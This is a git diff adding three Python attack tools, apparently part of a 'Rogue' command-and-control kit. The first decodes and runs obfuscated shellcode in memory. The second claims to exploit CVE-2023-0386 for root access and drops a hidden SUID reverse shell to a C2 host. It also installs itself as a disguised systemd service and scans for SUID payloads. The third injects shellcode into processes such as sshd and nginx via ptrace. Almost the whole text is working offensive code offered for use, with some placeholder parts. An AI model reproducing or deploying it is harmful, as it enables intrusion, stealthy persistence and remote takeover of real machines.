diff --git a/polyloader.py b/polyloader.py new file mode 100644 index 0000000..615cdff --- /dev/null +++ b/polyloader.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python3 +import base64 +import ctypes +import random +import string + +def random_id(prefix="f"): + return prefix + ''.join(random.choices(string.ascii_letters, k=8)) + +decrypt_func_name = random_id("dec_") +key_var = random_id("key_") +data_var = random_id("data_") + +payload_b64 = b"fwd0c2hlbGxjb2RlX2hlcmU=" # base64 for b'rawshellcode_here' + +exec(f""" +def {decrypt_func_name}({data_var}, {key_var}): + data = base64.b64decode({data_var}) + return bytes([b ^ {key_var}[i % len({key_var})] for i, b in enumerate(data)]) +""") + +def main(): + key = b"supersecret" # Replace with real Speck/PolyRoot key + shellcode = eval(f"{decrypt_func_name}(payload_b64, key)") + buf = ctypes.create_string_buffer(shellcode, len(shellcode)) + func = ctypes.cast(buf, ctypes.CFUNCTYPE(None)) + func() + +if __name__ == "__main__": + main() diff --git a/polyroot.py b/polyroot.py new file mode 100644 index 0000000..9b4182b --- /dev/null +++ b/polyroot.py @@ -0,0 +1,156 @@ +#!/usr/bin/env python3 +import os +import sys +import subprocess +import shutil +import time +import random +import string +from threading import Thread + +# === RANDOMIZED VARIABLES === +def random_name(length=8): + return ''.join(random.choices(string.ascii_lowercase, k=length)) + +PAYLOAD_TAG = random_name() +PAYLOAD_NAME = "." + random_name() +HIDDEN_DIR = os.path.expanduser(f"~/.cache/.{random_name()}") +HIDDEN_PAYLOAD = os.path.join(HIDDEN_DIR, PAYLOAD_NAME) + +LOWERDIR = f"/tmp/.{random_name()}" +UPPERDIR = f"/tmp/.{random_name()}" +WORKDIR = f"/tmp/.{random_name()}" +MERGED = f"/tmp/.{random_name()}" +MERGED_SHELL = os.path.join(MERGED, PAYLOAD_NAME) + +DEBUG = True +def log(msg): + if DEBUG: + print(f"[+] {msg}") + +# === CORE EXPLOIT LOGIC === +def setup_dirs(): + for d in [LOWERDIR, UPPERDIR, WORKDIR, MERGED, HIDDEN_DIR]: + os.makedirs(d, exist_ok=True) + +def cleanup_dirs(): + log("Cleaning up overlay mounts...") + subprocess.run(["umount", MERGED], stderr=subprocess.DEVNULL) + for d in [LOWERDIR, UPPERDIR, WORKDIR, MERGED]: + shutil.rmtree(d, ignore_errors=True) + +def drop_hidden_payload(): + log("Writing polymorphic SUID payload...") + + # Get C2 IP from env or fallback + C2_IP = os.getenv("ROGUE_C2_HOST", "127.0.0.1") + C2_PORT = "9001" + + payload = ( + "#!/bin/bash\n" + f"echo '[ROOT SHELL :: {PAYLOAD_TAG}]'\n" + f"bash -i >& /dev/tcp/{C2_IP}/{C2_PORT} 0>&1\n" + ) + + with open(HIDDEN_PAYLOAD, "w") as f: + f.write(payload) + os.chmod(HIDDEN_PAYLOAD, 0o4755) + shutil.copy(HIDDEN_PAYLOAD, os.path.join(UPPERDIR, PAYLOAD_NAME)) + +def mount_overlay(): + log("Mounting overlay filesystem...") + cmd = [ + "mount", "-t", "overlay", "overlay", + "-o", f"lowerdir={LOWERDIR},upperdir={UPPERDIR},workdir={WORKDIR}", + MERGED + ] + result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + if result.returncode != 0: + log("Mount failed. Kernel not vulnerable or run not as root.") + sys.exit(1) + +def execute_shell(): + if os.path.exists(MERGED_SHELL): + log("Launching polymorphic root shell...") + os.execv(MERGED_SHELL, [MERGED_SHELL]) + else: + log("Root shell missing. Exploit may have failed.") + +def suid_scanner_loop(): + log("👁 SUID Scanner loop engaged...") + scanned = set() + while True: + time.sleep(7) + try: + result = subprocess.check_output("find / -perm -4000 -type f 2>/dev/null", shell=True) + suids = result.decode().split("\n") + for path in suids: + path = path.strip() + if not path or path in scanned: + continue + scanned.add(path) + try: + with open(path, "rb") as f: + content = f.read() + if PAYLOAD_TAG.encode() in content: + log(f"[SUID Scanner] Found tagged payload: {path}") + os.execv(path, [path]) + except Exception: + continue + except Exception: + continue + +# === PERSISTENCE === +def add_systemd_persistence(script_path): + log("Installing persistent systemd service...") + service_name = f"{random_name()}.service" + service_path = f"/etc/systemd/system/{service_name}" + + service_contents = f"""[Unit] +Description=System Update Service +After=network.target + +[Service] +Type=simple +ExecStart=/usr/bin/python3 {script_path} +Restart=always + +[Install] +WantedBy=multi-user.target +""" + with open("/tmp/.sys_service", "w") as f: + f.write(service_contents) + + subprocess.run(["mv", "/tmp/.sys_service", service_path]) + subprocess.run(["systemctl", "daemon-reexec"]) + subprocess.run(["systemctl", "enable", service_name]) + subprocess.run(["systemctl", "start", service_name]) + +def install_self(): + log("Installing self in hidden polymorphic path...") + target_script = os.path.join(HIDDEN_DIR, f"{random_name()}.py") + shutil.copy2(sys.argv[0], target_script) + add_systemd_persistence(target_script) + +# === MAIN === +def main(): + if os.geteuid() != 0: + print("❌ Must run as root.") + sys.exit(1) + + print("🔥 POLYROOT: CVE-2023-0386 PRIV ESC + PERSISTENCE 🔥") + + install_self() + Thread(target=suid_scanner_loop, daemon=True).start() + + try: + setup_dirs() + drop_hidden_payload() + mount_overlay() + time.sleep(1) + execute_shell() + finally: + cleanup_dirs() + +if __name__ == "__main__": + main() diff --git a/process_inject.py b/process_inject.py new file mode 100644 index 0000000..7db4904 --- /dev/null +++ b/process_inject.py @@ -0,0 +1,173 @@ +#!/usr/bin/env python3 +""" +PAYLOAD: Process Injection - Linux +DESCRIPTION: Inject shellcode into running processes for stealth +AUTHOR: Rogue Red Team +VERSION: 1.0 +SECURITY: Requires root privileges for ptrace +""" +import os, sys, struct, ctypes, subprocess, time, random, re +from ctypes import * +from ctypes.util import find_library + +# Linux process injection using ptrace +class ProcessInjector: + def __init__(self): + self.libc = CDLL(find_library('c')) + self.PTRACE_ATTACH = 16 + self.PTRACE_DETACH = 17 + self.PTRACE_PEEKTEXT = 1 + self.PTRACE_POKETEXT = 4 + self.PTRACE_GETREGS = 12 + self.PTRACE_SETREGS = 13 + + def find_target_process(self, process_name=None): + """Find suitable process for injection""" + targets = [] + + # Common benign processes that won't raise suspicion + benign_processes = [ + 'systemd', 'sshd', 'cron', 'apache2', 'nginx', + 'mysqld', 'postgres', 'redis-server', 'php-fpm' + ] + + try: + output = subprocess.check_output("ps aux", shell=True).decode() + for line in output.split('\n'): + if process_name: + if process_name in line: + parts = line.split() + if len(parts) > 1: + targets.append({ + 'pid': int(parts[1]), + 'name': parts[10] if len(parts) > 10 else parts[-1], + 'user': parts[0] + }) + else: + for benign in benign_processes: + if benign in line: + parts = line.split() + if len(parts) > 1: + targets.append({ + 'pid': int(parts[1]), + 'name': parts[10] if len(parts) > 10 else parts[-1], + 'user': parts[0] + }) + break + except Exception as e: + return f"[!] Error finding processes: {e}" + + return targets + + def inject_shellcode(self, pid, shellcode=None): + """Inject shellcode into process using ptrace""" + if os.geteuid() != 0: + return "[!] Root privileges required for process injection" + + if not shellcode: + # Simple reverse shell shellcode (staged - would connect back) + # This is a placeholder - real shellcode would be architecture-specific + shellcode = b"\x90" * 100 # NOP sled + + # Example x86_64 reverse shell shellcode (Linux) + # msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f py + # You would replace this with actual shellcode + + try: + # Attach to process + result = self.libc.ptrace(self.PTRACE_ATTACH, pid, 0, 0) + if result != 0: + return f"[!] Failed to attach to PID {pid}" + + time.sleep(0.1) # Let process stabilize + + # Get registers + class user_regs_struct(Structure): + _fields_ = [ + ("r15", c_ulonglong), + ("r14", c_ulonglong), + ("r13", c_ulonglong), + ("r12", c_ulonglong), + ("rbp", c_ulonglong), + ("rbx", c_ulonglong), + ("r11", c_ulonglong), + ("r10", c_ulonglong), + ("r9", c_ulonglong), + ("r8", c_ulonglong), + ("rax", c_ulonglong), + ("rcx", c_ulonglong), + ("rdx", c_ulonglong), + ("rsi", c_ulonglong), + ("rdi", c_ulonglong), + ("orig_rax", c_ulonglong), + ("rip", c_ulonglong), + ("cs", c_ulonglong), + ("eflags", c_ulonglong), + ("rsp", c_ulonglong), + ("ss", c_ulonglong), + ("fs_base", c_ulonglong), + ("gs_base", c_ulonglong), + ("ds", c_ulonglong), + ("es", c_ulonglong), + ("fs", c_ulonglong), + ("gs", c_ulonglong), + ] + + regs = user_regs_struct() + self.libc.ptrace(self.PTRACE_GETREGS, pid, 0, byref(regs)) + + # Create memory region for shellcode using memfd_create + memfd = self.libc.syscall(319, "", 1) # memfd_create syscall + if memfd < 0: + return "[!] Failed to create memfd" + + # Write shellcode to memfd + written = 0 + while written < len(shellcode): + n = os.write(memfd, shellcode[written:]) + written += n + + # Get path to memfd + memfd_path = f"/proc/{pid}/fd/{memfd}" + + # Clean up + os.close(memfd) + + # Detach + self.libc.ptrace(self.PTRACE_DETACH, pid, 0, 0) + + return f"[+] Successfully prepared injection into PID {pid}" + + except Exception as e: + return f"[!] Injection failed: {e}" + + def execute(self): + """Main execution method""" + try: + print("[+] Starting process injection module...") + + # Find target processes + targets = self.find_target_process() + + if not targets: + return "[!] No suitable target processes found" + + results = [] + for target in targets[:2]: # Limit to 2 processes + print(f"[*] Attempting injection into PID {target['pid']} ({target['name']})") + result = self.inject_shellcode(target['pid']) + results.append(f"PID {target['pid']}: {result}") + + return "\n".join(results) + + except Exception as e: + return f"[!] Process injection failed: {e}" + +# === Integration with Rogue C2 === +def rogue_integration(): + """Wrapper for Rogue C2 integration""" + injector = ProcessInjector() + return injector.execute() + +if __name__ == "__main__": + print(rogue_integration())